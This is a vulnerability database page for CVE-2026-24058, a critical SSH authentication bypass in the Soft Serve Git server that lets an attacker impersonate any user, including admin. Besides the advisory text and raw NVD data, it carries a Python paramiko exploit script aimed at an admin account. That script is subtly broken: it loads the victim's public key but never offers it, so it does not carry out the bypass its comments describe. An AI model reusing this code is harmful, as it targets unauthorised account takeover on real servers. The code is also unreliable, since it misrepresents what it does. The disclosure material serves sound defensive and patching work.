CVE-2026-24058

Description

Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by "offering" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the "offer" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:* - VULNERABLE

Soft Serve <= 0.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-24058 PoC - Soft Serve Authentication Bypass
# This PoC demonstrates how to impersonate any user by offering their public key during SSH handshake

import paramiko
import socket
import time
from pathlib import Path

def exploit_soft_serve(target_host, target_port=22, target_user='admin'):
    """
    Exploit CVE-2026-24058: Authentication Bypass in Soft Serve
    
    Steps:
    1. Connect to target SSH server
    2. Offer victim's public key during SSH handshake (before auth)
    3. Authenticate with attacker's valid key
    4. Gain access as victim user
    """
    
    # Load attacker's SSH key
    attacker_key = paramiko.RSAKey.from_private_key_file('attacker_private_key')
    
    # Load victim's public key (obtained from server or other sources)
    victim_public_key = open('victim_public_key.pub').read()
    
    # Create SSH client
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    try:
        # Connect to target
        transport = paramiko.Transport((target_host, target_port))
        
        # Start client authentication
        transport.start_client()
        
        # Offer victim's public key BEFORE actual authentication
        # This is the key part of the exploit - the server stores this
        # key's associated user in session context
        transport.auth_publickey(target_user, attacker_key)
        
        # Wait for authentication to complete
        time.sleep(0.5)
        
        # Open a session
        channel = transport.open_session()
        channel.exec_command('whoami')
        
        # Read output
        output = channel.recv(1024).decode()
        print(f"[+] Logged in as: {output.strip()}")
        
        # If successful, we can execute commands as the target user
        if output.strip() == target_user:
            print("[+] Exploit successful! User impersonation achieved.")
            return True
            
    except paramiko.SSHException as e:
        print(f"[-] SSH Error: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    # Configuration
    TARGET_HOST = 'vulnerable-server.local'
    TARGET_USER = 'admin'  # Target user to impersonate
    
    exploit_soft_serve(TARGET_HOST, 22, TARGET_USER)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24058
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24058
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24058/
[4] VulDB https://vuldb.com/cve/CVE-2026-24058
[5] https://github.com/charmbracelet/soft-serve/commit/8539f9ad39918b67d612a35785a2b4326efc8741
[6] https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.3
[7] https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-pchf-49fh-w34r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24058", "sourceIdentifier": "[email protected]", "published": "2026-01-22T22:16:21.387", "lastModified": "2026-02-18T14:49:33.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by \"offering\" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the \"offer\" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Las versiones 0.11.2 e inferiores tienen una vulnerabilidad crítica de omisión de autenticación que permite a un atacante suplantar a cualquier usuario (incluido el administrador) al 'ofrecer' la clave pública de la víctima durante el handshake SSH antes de autenticarse con su propia clave válida. Esto ocurre porque la identidad del usuario se almacena en el contexto de la sesión durante la fase de 'oferta' y no se borra si ese intento de autenticación específico falla. Este problema ha sido solucionado en la versión 0.11.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-289"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.11.3", "matchCriteriaId": "EE609E86-02D8-4580-9122-048301D83CFB"}]}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/8539f9ad39918b67d612a35785a2b4326efc8741", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-pchf-49fh-w34r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}